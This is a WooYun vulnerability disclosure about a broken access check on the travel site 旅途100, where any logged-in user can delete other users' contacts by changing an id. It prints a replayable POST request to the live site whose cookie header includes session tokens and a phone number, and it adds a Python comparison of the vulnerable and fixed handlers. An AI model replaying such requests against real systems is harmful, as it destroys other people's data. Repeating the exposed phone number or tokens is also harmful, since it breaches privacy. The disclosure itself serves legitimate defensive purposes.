
Vulnerability summary

Defect ID: wooyun-2015-0107728

Title: 旅途100 allows deleting any user's contacts (more than 80,000 records affected)

Vendor: 旅途100

Author: wood425

Submitted: 2015-04-15 19:10

Fix deadline: 2015-05-30 19:12

Published: 2015-05-30 19:12

Vulnerability type: design flaw / logic error

Severity: High

Self-assessed rank: 10

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-04-15: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-05-30: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

旅途100 allows deleting any user's contacts (more than 80,000 records affected)

Detailed description:

[screenshot: 21.png]

Using two accounts, delete a contact and capture the request:

POST /UserCenter/Delete HTTP/1.1
Host: www.lvtu100.com:8081
Proxy-Connection: keep-alive
Content-Length: 8
Accept: */*
Origin: http://www.lvtu100.com:8081
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.lvtu100.com:8081/UserCenter/Contacts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=b4pkw3vqd0y5fzrubw1xnx0s; pgv_pvi=8561523712; pgv_si=s2419393536; phone=18075958330; lt_s_u=ED246292D1C985471266BB56ADFA2256; c_t_l=1654CBEC3FD30C65; ts=9927e4ddb82a6c3faf659c38084e7cd4; jiathis_rdc=%7B%22http%3A//www.lvtu100.com/Login/ForgetPwd%22%3A-1292842139%2C%22http%3A//www.lvtu100.com/Login%3FredirectURL%3Dhttp%3A//www.lvtu100.com%3A8081/UserCenter/OrderDetail%3ForderId%3D150413213311664%22%3A-1292837084%2C%22http%3A//www.lvtu100.com/Reg%22%3A-1292835072%2C%22http%3A//www.lvtu100.com/Reg/Agreement%22%3A-1292729609%2C%22http%3A//www.lvtu100.com/Activity%22%3A-1292727615%2C%22http%3A//www.lvtu100.com/UserCenter%22%3A-1292725073%2C%22http%3A//www.lvtu100.com/UserCenter/OrderDetail%3ForderId%3D150413213311664%22%3A-1292502150%2C%22http%3A//www.lvtu100.com/UserCenter/Contacts%22%3A-1291236636%2C%22http%3A//www.lvtu100.com/UserCenter/ContactMod%3Fid%3D81242%22%3A-1291231566%2C%22http%3A//www.lvtu100.com/UserCenter/OrderDetail%3ForderId%3D150413212761251%22%3A-1290421101%2C%22http%3A//www.lvtu100.com/%22%3A-1290306177%2C%22http%3A//www.lvtu100.com/Login%22%3A-1290308907%2C%22http%3A//www.lvtu100.com%3A8081/Order/OrderDetail%3ForderId%3D150413212761251%22%3A-1290291684%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter%22%3A-1290274181%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81239%22%3A-1290217028%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactAdd%22%3A-1290064935%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81211%22%3A-1287580276%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D8121%22%3A-1287571431%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81231%22%3A-1287428094%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81238%22%3A-1287424133%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81230%22%3A-1287370810%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81228%22%3A-1287347558%2C%22http%3A//www.lvtu10
0.com%3A8081/UserCenter/ContactMod%3Fid%3D81210%22%3A-1287268036%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D8125%22%3A-1287214312%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D810%22%3A-1287024015%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/ContactMod%3Fid%3D81246%22%3A0%7C1428937210705%2C%22http%3A//www.lvtu100.com%3A8081/UserCenter/Contacts%22%3A%220%7C1428937405588%22%7D; Hm_lvt_f64a581bfdfaef6e87f7d985c57ee087=1428931263; Hm_lpvt_f64a581bfdfaef6e87f7d985c57ee087=1428937406
id=81242


Change the id parameter and the deletion succeeds: the server deletes whichever contact id is sent, without checking that the contact belongs to the logged-in session.

[screenshot: 32.png]
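To make the defect concrete, here is an added illustration (not 旅途100's code) of a delete handler that trusts the client-supplied id, beside one that scopes the delete to the session's owner. The user names and contact rows are constructed; the ids echo those visible in the captured request.

```python
# Added example (not the vendor's code): the missing ownership check behind
# /UserCenter/Delete, modelled on a small in-memory contacts table.
from typing import Dict

# Constructed sample data: contact id -> owner and name. Ids are taken from
# the captured request; the owners and names are invented.
CONTACTS: Dict[int, dict] = {
    81239: {"owner": "user-A", "name": "contact of A"},
    81242: {"owner": "user-B", "name": "contact of B"},
}


def delete_contact_vulnerable(contacts: Dict[int, dict], session_user: str, contact_id: int) -> bool:
    """Deletes whatever id the client sends. The session only proves that
    someone is logged in, so any authenticated user can delete any contact
    (this is the reported bug). session_user is never consulted."""
    return contacts.pop(contact_id, None) is not None


def delete_contact_fixed(contacts: Dict[int, dict], session_user: str, contact_id: int) -> bool:
    """Scopes the delete to the caller: the row must exist AND belong to the
    session user (in SQL terms: DELETE ... WHERE Id = @id AND Owner = @user).
    Unknown and foreign ids get the same answer, so the endpoint does not
    reveal which ids exist."""
    row = contacts.get(contact_id)
    if row is None or row["owner"] != session_user:
        return False
    del contacts[contact_id]
    return True


def demo():
    """Replays the report: user-B sends user-A's contact id."""
    # Vulnerable handler: the cross-user delete succeeds.
    vuln_table = dict(CONTACTS)
    cross_vuln = delete_contact_vulnerable(vuln_table, "user-B", 81239)
    # Fixed handler: the cross-user delete is refused, B's own delete works.
    fixed_table = dict(CONTACTS)
    cross_fixed = delete_contact_fixed(fixed_table, "user-B", 81239)
    own_fixed = delete_contact_fixed(fixed_table, "user-B", 81242)
    return cross_vuln, cross_fixed, own_fixed, sorted(fixed_table)


if __name__ == "__main__":
    print(demo())  # (True, False, True, [81239])
```

For detection, the same mismatch is visible server-side: log the session user together with the owner of the row a delete request names, and alert when they differ.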

Proof of vulnerability:

As above.

Fix recommendation:

Copyright notice: please credit the source when reposting, wood425@WooYun


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused the report.